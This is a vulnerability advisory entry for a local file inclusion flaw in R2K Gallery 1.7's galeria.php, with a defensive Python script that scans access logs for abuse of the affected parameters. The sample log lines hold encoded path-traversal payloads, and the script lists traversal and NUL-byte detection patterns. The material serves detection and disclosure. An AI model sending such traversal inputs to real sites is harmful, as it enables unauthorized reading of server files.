vendor: R2K Gallery
by: Y! Underground Group
CVSS: 5.5 (MEDIUM)
Local File Include
CWE: 22
Product Name: R2K Gallery
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
R2K Gallery v1.7 Local File Include Vuln
R2K Gallery v1.7 contains a local file inclusion vulnerability. An attacker can exploit it by manipulating the 'pictures_folder' and 'lang2' parameters of the 'galeria.php' script to include arbitrary files from the local system. This can lead to unauthorized access, information disclosure, and possibly remote code execution.
Mitigation:
The vendor has not released a patch for this vulnerability. To mitigate the risk, it is recommended to restrict access to the vulnerable script or update to a newer version of the software.
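Because no patch exists, reviewing web server logs for abuse of the two parameters is a practical complement to restricting access. The following detection sketch is an added example, not part of the original advisory or of R2K Gallery: it flags requests to galeria.php whose pictures_folder or lang2 value carries traversal, absolute-path, NUL-byte or URL-scheme markers. The combined log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "galeria.php"                           # script named in the advisory
WATCHED_PARAMS = {"pictures_folder", "lang2"}    # parameters named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /gallery/galeria.php?lang2=en HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /gallery/galeria.php?lang2=..%2F..%2Fconfig HTTP/1.1" 200 90',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /gallery/galeria.php?pictures_folder=%252e%252e%252fprivate%00 HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?lang2=../x HTTP/1.1" 404 0',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e -> %2e -> '.')."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_reasons(value):
    """Return the reasons a parameter value looks like a path-injection attempt."""
    v = fully_decode(value).replace("\\", "/")
    reasons = []
    if ".." in v.split("/"):
        reasons.append("traversal")
    if v.startswith("/") or re.match(r"^[A-Za-z]:/", v):
        reasons.append("absolute-path")
    if "\x00" in v:
        reasons.append("nul-byte")
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*://", v):
        reasons.append("url-scheme")
    return reasons

def scan_line(line):
    """Return [(param, reasons)] for one access-log line, or [] if nothing is flagged."""
    m = REQUEST_RE.search(line)
    url = urlsplit(m.group(1)) if m else None
    if url is None or url.path.rsplit("/", 1)[-1].lower() != SCRIPT:
        return []
    pairs = parse_qsl(url.query, keep_blank_values=True)
    hits = [(k, suspicious_reasons(v)) for k, v in pairs if k in WATCHED_PARAMS]
    return [(k, r) for k, r in hits if r]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_line(line))
```

Only query-string values are visible in a standard access log, so parameters sent in a POST body need inspection at a proxy or WAF instead.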